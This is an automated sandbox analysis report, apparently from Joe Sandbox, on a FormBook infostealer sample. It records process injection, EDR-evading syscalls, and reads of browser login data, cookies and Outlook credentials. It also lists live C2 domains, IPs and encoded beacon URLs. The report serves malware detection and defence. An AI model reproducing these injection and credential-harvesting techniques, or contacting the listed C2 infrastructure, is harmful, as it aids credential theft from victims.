                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\VSP469620.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\icsunattend.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\icsunattend.exeThread register set: target process: 1516Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\icsunattend.exeThread APC queued: target process: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\VSP469620.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E2008Jump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEB106 LogonUserW,2_2_00AEB106
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_00AB3D19
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF411C SendInput,keybd_event,2_2_00AF411C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF74BB mouse_event,2_2_00AF74BB
                Source: C:\Users\user\Desktop\VSP469620.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\VSP469620.exe"Jump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00AEA66C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00AF71FA
                Source: VSP469620.exe, VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: VSP469620.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD65C4 cpuid 2_2_00AD65C4
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B0091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,2_2_00B0091D
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B2B340 GetUserNameW,2_2_00B2B340
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00AE1E8E
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00ACDDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\icsunattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: VSP469620.exeBinary or memory string: WIN_81
                Source: VSP469620.exeBinary or memory string: WIN_XP
                Source: VSP469620.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: VSP469620.exeBinary or memory string: WIN_XPe
                Source: VSP469620.exeBinary or memory string: WIN_VISTA
                Source: VSP469620.exeBinary or memory string: WIN_7
                Source: VSP469620.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B08C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00B08C4F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B0923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00B0923B
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE58C5 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,2_2_00AE58C5

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561727 Sample: VSP469620.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 28 www.heliopsis.xyz 2->28 30 www.aktmarket.xyz 2->30 32 9 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 VSP469620.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 VgGNmkZfWSSE.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 icsunattend.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 VgGNmkZfWSSE.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.urbanxplore.info 209.74.77.108, 49991, 49992, 49993 MULTIBAND-NEWHOPEUS United States 22->34 36 funnystory.online 172.104.82.74, 49853, 80 LINODE-APLinodeLLCUS United States 22->36 38 4 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                VSP469620.exe63%ReversingLabsWin32.Trojan.AutoitInject
                VSP469620.exe65%VirustotalBrowse
                VSP469620.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.nartex-uf.online0%VirustotalBrowse
                www.aktmarket.xyz1%VirustotalBrowse
                funnystory.online0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.aktmarket.xyz/4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD40%Avira URL Cloudsafe
                http://www.cssa.auction/bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD40%Avira URL Cloudsafe
                https://server194.hosting.reg.ru/manager0%Avira URL Cloudsafe
                https://2domains.ru0%Avira URL Cloudsafe
                http://www.nartex-uf.online/9ul0/0%Avira URL Cloudsafe
                http://www.a1shop.shop/5cnx/0%Avira URL Cloudsafe
                http://www.heliopsis.xyz/cclj/0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-Medium.woff2)0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)0%Avira URL Cloudsafe
                http://www.funnystory.online/2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD40%Avira URL Cloudsafe
                http://www.aktmarket.xyz/4mbo/0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-Medium.woff)0%Avira URL Cloudsafe
                http://www.a1shop.shop/5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD40%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-Regular.woff)0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-Regular.woff2)0%Avira URL Cloudsafe
                http://www.3kw40881107247y.click/stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w==0%Avira URL Cloudsafe
                http://www.3kw40881107247y.click/stfe/0%Avira URL Cloudsafe
                http://www.cssa.auction/bw18/0%Avira URL Cloudsafe
                http://www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD40%Avira URL Cloudsafe
                http://www.nartex-uf.online/9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD40%Avira URL Cloudsafe
                http://www.heliopsis.xyz0%Avira URL Cloudsafe
                http://funnystory.online/2dyu/?9HaD=bADo0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.nartex-uf.online
                		31.31.196.177
                		truetrueunknown
                www.aktmarket.xyz
                		13.248.169.48
                		truetrueunknown
                funnystory.online
                		172.104.82.74
                		truetrueunknown
                www.urbanxplore.info
                		209.74.77.108
                		truetrue
                  		unknown
                  www.heliopsis.xyz
                  		13.248.169.48
                  		truetrue
                    		unknown
                    cssa.auction
                    		107.167.84.42
                    		truetrue
                      		unknown
                      www.a1shop.shop
                      		13.248.169.48
                      		truetrue
                        		unknown
                        www.3kw40881107247y.click
                        		104.21.44.16
                        		truetrue
                          		unknown
                          www.mdpc7.top
                          		unknown
                          		unknownfalse
                            		unknown
                            www.cssa.auction
                            		unknown
                            		unknownfalse
                              		unknown
                              www.funnystory.online
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.nartex-uf.online/9ul0/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.aktmarket.xyz/4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cssa.auction/bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.a1shop.shop/5cnx/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.heliopsis.xyz/cclj/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.funnystory.online/2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.aktmarket.xyz/4mbo/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cssa.auction/bw18/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.3kw40881107247y.click/stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.3kw40881107247y.click/stfe/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.a1shop.shop/5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nartex-uf.online/9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabicsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://files.reg.ru/fonts/inter/Inter-Medium.woff2)icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://server194.hosting.reg.ru/managerVgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://2domains.ruicsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ecosia.org/newtab/icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.reg.ru/support/#requesticsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://ac.ecosia.org/autocomplete?q=icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://files.reg.ru/fonts/inter/Inter-Regular.woff)icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://files.reg.ru/fonts/inter/Inter-Medium.woff)icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchicsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://files.reg.ru/fonts/inter/Inter-Regular.woff2)icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.heliopsis.xyzVgGNmkZfWSSE.exe, 0000000A.00000002.3143475754.00000000011EA000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
